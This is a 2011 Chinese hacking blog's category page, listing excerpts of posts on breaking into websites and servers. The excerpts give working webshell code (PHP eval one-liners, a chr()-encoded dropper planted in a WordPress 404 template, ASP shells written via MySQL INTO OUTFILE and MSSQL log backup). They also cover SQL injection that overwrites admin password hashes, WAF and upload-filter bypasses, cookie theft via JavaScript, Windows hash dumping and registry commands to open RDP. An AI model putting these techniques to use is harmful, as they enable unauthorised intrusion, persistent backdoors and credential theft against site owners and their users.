随笔分类 -  【技术文章】

摘要:有时 传了 木马上去后 直接是 xiaoma.asp还有种 是按照时间生成名字如201103091**************.asp下面这种如果又 没有回显的话 就可以做 个字典扫生成字典uploadfile/2011/1/1/2011012847000000.aspuploadfile/2011/1/1/2011012847000001.aspuploadfile/2011/1/1/2011012847000002.aspuploadfile/2011/1/1/2011012847000003.aspuploadfile/2011/1/1/2011012847000004.asp————— 阅读全文
posted @ 2011-10-02 04:39 WHaa_(T_T) 阅读(254) 评论(0) 推荐(0)
摘要:linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。代码如下:<?php$path = stripslashes($_GET['path']);$ok = chmod ($path , 0777);if ($ok == true)echo CHMOD OK , Permission editable file or directory. Permission to write;?><?php$path = stripslashes($_GET['path']);$o 阅读全文
posted @ 2011-10-02 04:28 WHaa_(T_T) 阅读(271) 评论(0) 推荐(0)
摘要:mysql hash 密码破解讲解:mysql的用户名密码保存在mysql库user表中,找到MySQL\data\mysql\目录下的 user.MYD user.MYI user.frm 三个文件,拷贝到自己的mysql数据库目录下,就可以查看用户的hash了。用sql语句提取hash则如下: use mysql; select user,password from user;得到hash: test:*085D85329E1557C869A120C9157315A07D51E8A7 ogame:*085D85329E1557C869A120C9157315A07D51E8A7 iii6_ 阅读全文
posted @ 2011-09-13 20:55 WHaa_(T_T) 阅读(629) 评论(0) 推荐(0)
摘要:一句话木马<?eval($_POST[cmd]);?>到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);fclose( 阅读全文
posted @ 2011-09-13 20:52 WHaa_(T_T) 阅读(209) 评论(0) 推荐(0)
摘要:现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。1.新建一个mdb2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;(实际是<% execute request(“a”)%>)3.改后缀为asp/asa4.上传5.一句话客户端或者菜刀连接 阅读全文
posted @ 2011-09-13 20:45 WHaa_(T_T) 阅读(425) 评论(0) 推荐(0)
摘要:很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。 注入点已经找到:http://xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。 密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 注射的语句如下: ;update shop_admin set pas 阅读全文
posted @ 2011-09-13 20:14 WHaa_(T_T) 阅读(304) 评论(0) 推荐(0)
摘要:看了一个站。有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是web 大马等上面的关键词。只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。上传测试。发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。= =|||他竟然直接判断是否存在<%%> 这是所有asp都存在的= =!! 需要传能解析的asp.怎么能少了<%%>呢?如何突破呢? 我翻我的一句话的时候看到了一个东西。如下://不需要用到<%%>这不就是一般的scrip 阅读全文
posted @ 2011-09-13 06:42 WHaa_(T_T) 阅读(242) 评论(0) 推荐(0)
摘要:php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma, 阅读全文
posted @ 2011-08-31 20:02 WHaa_(T_T) 阅读(1511) 评论(0) 推荐(0)
摘要:进入后台后台-外观-编辑,找到404的问题插入马,马的代码:<script language=”php”>fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));< 阅读全文
posted @ 2011-08-31 19:54 WHaa_(T_T) 阅读(443) 评论(0) 推荐(0)
摘要:字符型: 1、恢复当前库;alter database 当前库 set RECOVERY FULL–2、建表cmd;create table cmd (a image)–3、备份当前库到D:\cmd1;backup log 当前库 to disk = ‘D:\cmd1′ with init–4、插入一句话代码到创建的表cmd;insert into cmd (a) values (‘<%%25**ecute(request(“a”))%%25>’)–5、备份一句话代码到站点根目录;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–6、完成; 阅读全文
posted @ 2011-08-31 19:16 WHaa_(T_T) 阅读(223) 评论(0) 推荐(0)
摘要:javascript:alert;window.clipboardData.setData('text',document.cookie);在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了! 阅读全文
posted @ 2011-08-31 19:14 WHaa_(T_T) 阅读(400) 评论(0) 推荐(0)
摘要:手工注入,工具是不行啦,第一咱先判断是否有注入点http://***.com/newsShow.asp?ArticleID=120 ’http://***.com/newsShow.asp?ArticleID=120 and 1=1http://***.com/newsShow.asp?ArticleID=120 and 1=2一直提示 “龙盾IIS防火墙”提示:请不要提交非法信息或恶意访问我想这个大家应该都不陌生,现在国内用这个的防火墙还挺多的,我看网上资料也比较少呵呵自己研究了一下成功突破~http://***.com/newsShow.asp?ArticleID=(120)%20and% 阅读全文
posted @ 2011-08-31 17:25 WHaa_(T_T) 阅读(284) 评论(0) 推荐(0)
摘要:首先判断注入点,在查询关键字那里输入:4%' and 1=1 and '%' =' 返回正常,没报错,然后输入:4%' and 1=2 and '%' ='报错了,说明这个地方是存在注入点的。这个是post的方式的,抓包之后,本来打算用工具来跑的,试了一下,没检测出来,我就用手工来慢慢检测吧。我没有马上查表名,而是去看了看后台,直接在域名后面加上admin成功爆出后台,找到后台后看了一下这个后台的源文件。好了,我们先来查询一下表名吧,在搜索框里输入:%'and(select count(*)from admin)>0 阅读全文
posted @ 2011-08-31 16:39 WHaa_(T_T) 阅读(1800) 评论(0) 推荐(0)
摘要:2、常用工具的细节内网入侵后,通常做法是抓出用户的hash来破密码,再试下别的机器是否同密码。抓hash,有三个基本的工具。●pwdump4、gethashes、 fgdump●,这三个exe大家应当都可以通过百度来搜索到。我常用的是gethashes,当gethashes无能为力的时候再请出fgdump。不过我以前喜欢用pwdump4,一般情况下●pwdump4 /l●就会抓出机器的密码HASH值。但是有人会发现,pwdump4 /l在3389里用不了。编辑文章时常看到有人入侵了3389,然后就说丢个 pwdump4上去抓hash,结果再也无话了。我估计这样的人都没有仔细操作。在3389情况 阅读全文
posted @ 2011-08-22 02:41 WHaa_(T_T) 阅读(405) 评论(0) 推荐(0)
摘要:条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。这儿利用的是马儿的专家模式(自己写代码)。ini_set(‘display_errors’, 1);set_time_limit(0);error_reporting(E_ALL);$connx = mysql_connect(“:/var/tmp/mysql.sock”, “forum”, “xx!!xx3″) or die(“Could not connect: ” . mysql_error());mysql_select_db(“discuz”,$connx) or die(“Could no 阅读全文
posted @ 2011-08-22 00:07 WHaa_(T_T) 阅读(166) 评论(0) 推荐(0)
摘要:用来替换文件的replace,连正在使用的文件也能替换。非常无敌。 比如:在C:\下建一个目录,c:\aaa 然后复制一首mp3到c:\aaa并命名为c:\aaa\a.mp3 然后再复制另一首歌到C:\a.mp3 然后用media player 播放c:\aaa\a.mp3在命令提示符下输入:replace c:\a.mp3 c:\aaa 过一会,是不是播放的歌已变为另一首。 用这个命令来替换系统文件真是太爽了,并且XP的系统文件保护也对它无效。 再也不用到安全模式下去替换文件了 格式 REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 阅读全文
posted @ 2011-08-02 22:41 WHaa_(T_T) 阅读(181) 评论(0) 推荐(0)
摘要:当我们知道一个网站的后台目录,却又无法确定后台登陆文件的时候,可以尝试在网址后面加上一个"."比如http://www.xxx.com/admin,我们打开后显示的是Directory Listing Denied,意思也就是说找不到此目录的默认首页,那么我们可以把地址改成www.xxx.com./admin,注意com后面多了一个".",这样的话可以直接跳转到登陆页面.T00LS里说貌似只有在IIS下才可会出现这样的情况,我找了几个站试了一下,发现并不是所有IIS架设的站点都支持这种方法.拿本站举个例子,打开http://www.xxx.cn/admi 阅读全文
posted @ 2011-06-02 09:05 WHaa_(T_T) 阅读(210) 评论(0) 推荐(0)
摘要:现在网络上的东西愈来愈不可信了。 不论下载什么工具都得多个心眼,特别是经常玩黑的朋友。 俗话说:常在河边走,哪有不湿鞋。弄不好哪天自己就中招了。 下面我就简单分析下,如何判断软件是否有后门。。 我把软件分为两大类:1.非黑*客系列软件(播放器、即时聊天工具) 2.黑*客系列软件(例如:啊D、S扫描器、**等) 因为大家都知道黑*客系列软件通常都会被杀软报毒,所以必须采用不同的分析方法,分别对待。 检测前,不要运行被检测程序! 主要工具有:PEiD0.95汉化版、捆绑文件提取工具1.0、Filemon7.04汉化版、冰刃1.22中文版、下载者监视器1.0 、Regmon704.rar、 文件分析 阅读全文
posted @ 2011-05-06 04:55 WHaa_(T_T) 阅读(1064) 评论(0) 推荐(1)
摘要:开启windows的3389端口的讨论网上很多,大多数是通过修改Termservice服务对应注册表项实现的,而且对于xp、2003方法不同,且大多数情况需要重启。其实组策略可以直接开启远程桌面的监听端口(前提:termservice服务已经启动),只需修改注册表一个地方:reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /Freg add"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&q 阅读全文
posted @ 2011-04-28 15:51 WHaa_(T_T) 阅读(847) 评论(0) 推荐(0)
摘要:过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System;using System.Web;using System.IO;public class Handler : IHttpHandler {public void ProcessRequest (HttpContext context) {context.Response.ContentTy 阅读全文
posted @ 2011-04-27 16:14 WHaa_(T_T) 阅读(365) 评论(0) 推荐(0)